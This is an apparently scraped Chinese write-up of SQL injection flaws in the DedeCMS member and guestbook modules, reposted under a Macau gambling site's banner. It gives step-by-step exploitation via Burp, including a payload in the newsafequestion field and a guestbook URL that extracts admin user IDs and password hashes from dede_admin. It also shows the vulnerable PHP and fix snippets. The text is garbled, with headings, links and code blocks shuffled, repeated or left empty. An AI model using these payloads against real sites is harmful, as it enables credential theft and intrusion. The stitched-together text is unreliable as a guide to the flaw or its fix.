澳门正规赌博十大网站-澳门游戏网站
做最好的网站

dedecms /member/uploads_edit.php SQL Injection Vul

/member/uploads_edit.php

1. 注册用户并且登陆  2. 打开http://127.0.0.1/dedecms5.5/member/edit_baseinfo.php  3. 填写完毕后,输入验证码,点击提交,打开BURP 抓包  4. 然后再BURP里修改newsafequestion 的值改成: 1',email=@`'`,uname=(select user()),email='sss  5. 然后提交 之后再打开http://127.0.0.1/dedecms5.5/member/edit_baseinfo.php  6. 就可以看到自己的、用户名变成了注入之后的结果了
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `dede_admin` LIMIT 0,1),email=' 

**dedecms /member/uploads_edit.php SQL Injection Vul。*Copyright (c) 2015 LittleHann All rights reserved***

dedecms /member/uploads_edit.php SQL Injection Vul。会员模块中设有的SQL注入

1. php magic_quotes_gpc=off  2. 漏洞文件存在: plus/guestbook.php  3. 在数据库中: dede_guestbook也需要存在
function SaveUploadInfo($title,$filename,$medaitype=1,$addinfos='')  {      global $dsql,$cfg_ml,$cfg_basedir;      if($filename=='')      {          return false;      }      if(!is_array($addinfos))      {          $addinfos[0] = $addinfos[1] = $addinfos[2] = 0;      }      if($medaitype==1)      {          $info = '';          $addinfos = GetImageSize($cfg_basedir.$filename,$info);      }      $addinfos[2] = @filesize($cfg_basedir.$filename);      $row = $dsql->GetOne("Select aid,title,url From `dede_uploads` where url like '$filename' And mid='".$cfg_ml->M_ID."'; ");      $uptime = time();      if(is_array($row))      {          $query = "Update `dede_uploads` set title='$title',mediatype='$medaitype',                       width='{$addinfos[0]}',height='{$addinfos[1]}',filesize='{$addinfos[2]}',uptime='$uptime'                       where aid='{$row['aid']}'; ";          $dsql->ExecuteNoneQuery($query);      }      else      {          //$filename未进行过滤就带入SQL查询,造成SQL注入          $inquery = "INSERT INTO `dede_uploads`(title,url,mediatype,width,height,playtime,filesize,uptime,mid)             VALUES ('$title','$filename','$medaitype','".$addinfos[0]."','".$addinfos[1]."','0','".$addinfos[2]."','$uptime','".$cfg_ml->M_ID."'); ";          $dsql->ExecuteNoneQuery($inquery);      }      return true;  }

**dedecms /member/uploads_edit.php SQL Injection Vul。Relevant Link:**

1. 漏洞描述

2. 纰漏触发条件

http://www.programgo.com/article/45492569994/  http://www.cnblogs.com/Hkadmin/p/3712667.html

memberincinc_archives_functions.php

/member/edit_baseinfo.php

3. 漏洞影响范围

1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考
http://www.wooyun.org/bugs/wooyun-2014-048873

catalog

catalog

catalog

http://pannisec.diandian.com/?tag=SQL注射

 

http://www.grabsun.com/article/2015/1216455.html

6. 进攻和防守考虑


*Copyright (c) 2015 LittleHann All rights reserved*

**Relevant Link:**

else if($dopost=='save')  {      $title = HtmlReplace($title,2);      if($mediatype==1) $utype = 'image';      else if($mediatype==2)      {          $utype = 'flash';      }      else if($mediatype==3)      {          $utype = 'media';      }      else      {          $utype = 'addon';      }      $title = HtmlReplace($title, 2);      /* 对$oldurl进行有效过滤 */      $oldurl = HtmlReplace($oldurl);      /* */      $exname = preg_replace("#(.*)/#", "", $oldurl);      $exname = preg_replace("#.(.*)$#", "", $exname);      $filename = MemberUploads('addonfile', $oldurl, $cfg_ml->M_ID, $utype,$exname, -1, -1, TRUE);      SaveUploadInfo($title, $filename, $mediatype);      ShowMsg("成功修改文件!", "uploads_edit.php?aid=$aid");  }

**Relevant Link:**

注射漏洞成功供给标准如下

http://cve.scap.org.cn/CVE-2009-2270.html  http://www.cnnvd.org.cn/vulnerability/show/cv_id/2009070008
1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考
else if($job=='editok')  {      $remsg = trim($remsg);        /* 验证$g_isadmin */      if($remsg!='')      {          //管理员回复不过滤HTML          if($g_isadmin)          {              $msg = "<div class=\'rebox\'>".$msg."</div>n".$remsg;               //$remsg <br><font color=red>管理员回复:</font>          }          else          {              $row = $dsql->GetOne("SELECT msg From `dede_guestbook` WHERE id='$id' ");              $oldmsg = "<div class=\'rebox\'>".addslashes($row['msg'])."</div>n";              $remsg = trimMsg(cn_substrR($remsg, 1024), 1);              $msg = $oldmsg.$remsg;          }      }      /* */      /* 对$msg进行有效过滤 */      $msg = addslashes($msg);      /* */      $dsql->ExecuteNoneQuery("UPDATE `dede_guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");      ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);      exit();  }

本文由澳门正规赌博十大网站发布于澳门游戏网站,转载请注明出处:dedecms /member/uploads_edit.php SQL Injection Vul